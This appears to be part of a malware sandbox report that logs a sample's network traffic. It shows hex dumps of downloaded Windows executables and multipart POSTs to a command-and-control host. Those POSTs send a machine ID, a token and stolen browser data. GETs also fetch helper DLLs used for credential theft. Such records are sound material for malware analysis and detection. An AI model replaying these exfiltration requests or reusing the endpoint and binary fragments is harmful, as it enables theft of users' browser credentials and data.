00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:47 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:49 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 22:47:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 41 35 39 44 31 37 39 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"3DEA59D179AA1106654546------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"default10------HDGIJJDGCBKFIDHIEBKE--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAAHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="message"browsers------GHJEHJJDAAAKEBGCFCAA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="message"plugins------JDGCGDBGCAAEBFIECGHD--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.172.128.76Content-Length: 7655Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 54 47 6c 75 61 30 6c 6b 50 54 49 78 4d 44 59 79 4e 44 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 62 47 6c 75 61 32 6c 6b 50 54 67 31 4d 54 55 30 4e 67 70 6f 64 48 52 77 63 7a 6f 76 4c 33 4e 31 63 48 42 76 63 6e 51 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6d 4e 76 62 53 39 6c 62 69 31 31 63 79 39 76 5a 6d 5a 70 59 32 55 76 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46 6b 50 33 64 30 4c 6d 31 6a 58 32 6c 6b 50 57 56 75 64 47 56 79 63 47 73 79 4d 44 45 32 4a 6e 56 70 50 57 56 75 4c 58 56 7a 4a 6e 4a 7a 50 57 56 75 4c 58 56 7a 4a 6d 46 6b 50 58 56 7a 43 6d 68 30 64 48 42 7a 4f 69 38 76 63 33 56 77 63 47 39 79 64 43 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 56 75 4c 58 56 7a 4c 32 39 6d 5a 6d 6c 6a 5a 53 38 35 4e 47 4a 68 4d 6d 55 77 59 69 30 32 4d 7a 68 6c 4c 54 52 68 4f 54 49 74 4f 44 67 31 4e 79 30 79 59 32 49 31 59 57 4d 78 5a 44 68 6c 4d 54 63 2f 64 57 6b 39 5a 57 34 74 64 58 4d 6d 63 6e 4d 39 5a 57 34 74 64 58 4d 6d 59 57 51 39 64 58 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 43 35 6a 62 32 30 76 5a 57 34 74 64 58 4d 76 62 32 5a 6d 61 57 4e 6c 4c 32 56 34 59 57 31 77 62 47 56 7a 4c 57 39 6d 4c 57 39 6d 5a 6d 6c 6a 5a 53 31 77 63 6d 39 6b 64 57 4e 30 4c 57 74 6c 65 58 4d 74 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEHJJDAAAKEBGCFCAAHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------GHJEHJJDAAAKEBGCFCAAContent-Disposition: form-data; name="file"------GHJEHJJDAAAKEBGCFCAA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 2d 2d 0d 0a Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file"------BGIJJKKJJDAAAAAKFHJJ--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
